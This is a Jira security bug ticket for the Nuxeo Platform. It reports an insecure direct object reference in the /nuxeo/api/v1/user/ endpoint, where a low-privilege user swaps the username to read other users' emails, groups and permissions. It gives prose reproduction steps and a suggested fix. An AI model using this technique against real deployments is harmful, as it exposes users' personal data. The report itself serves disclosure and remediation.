Uploaded image for project: 'Nuxeo Platform'
  1. Nuxeo Platform
  2. NXP-32588

#PT22227_3 Sensitive Exposure of Data Belonging to Other Users

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Open
    • Priority: Minor
    • Resolution: Unresolved
    • Affects Version/s: None
    • Fix Version/s: None
    • Component/s: Security

      Description

      Criticality Justification
      A threat actor could use this attack to obtain confidential information from system users by making these queries to the /api/v1/user/ API path, obtaining user names, groups to which the user belongs, email addresses, user permissions, among others. Resulting in the unauthorized disclosure of this information

      Steps To Reproduce
      After logging in with a low privilege userhttps://api.us.cobalt.io/v1/attachments/att_hW3Y1Ng/preview) (https://api.us.cobalt.io/v1/attachments/att_6ckiHpD/preview)
      A request is sent to the application by making a request to the /nuxeo/api/v1/user/user-pentest-1 API endpoint, where user-pentest-1 refers to the user with which the platform was accessed. In this way, the personal information of the user with which entered the platform is displayed: (https://api.us.cobalt.io/v1/attachments/att_o5jcwO7/preview)
      When the previous request is intercepted, the username at the URL can be changed to any user that the platform has, obtaining the personal data of other users of the system, including administrators:
      a) pentest-admin (https://api.us.cobalt.io/v1/attachments/att_los7h7B/preview) (https://api.us.cobalt.io/v1/attachments/att_KZLa6zH/preview)
      b) pentest-admin-2 (https://api.us.cobalt.io/v1/attachments/att_15NjAzn/preview) (https://api.us.cobalt.io/v1/attachments/att_z4FNpvX/preview)
      However, when trying to obtain the information of an administrative user from the frontend of the web with the search engine you can see that the address /api/ does not seem to appear in the request made by the user and when trying to access one of the administrative users you get a redirection and subsequent 404 error. (https://api.us.cobalt.io/v1/attachments/att_ZGjVScd/preview) (https://api.us.cobalt.io/v1/attachments/att_6Lgk3lf/preview)

      Suggested Fix
      1. Implement proper authorization and avoid using references that can be anticipated easily. Developers should use Globally Unique Identifiers (GUIDs) as a best practice to identify reference objects. A GUID is a defined hexadecimal number that can go up to 128 bits in size, enabling the creation of random numbers that are almost always unique.
      2. Check access for each use of a direct object reference from an untrusted source must include an access control check to ensure the user is authorized for the requested object.

      Prerequisites
      It requires prior authentication with an active account in the service is required regardless of the privilege level

        Attachments

          Activity

            People

            • Assignee:
              Unassigned
              Reporter:
              santony Sooraj Antony
              Participants:
            • Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

              • Created:
                Updated: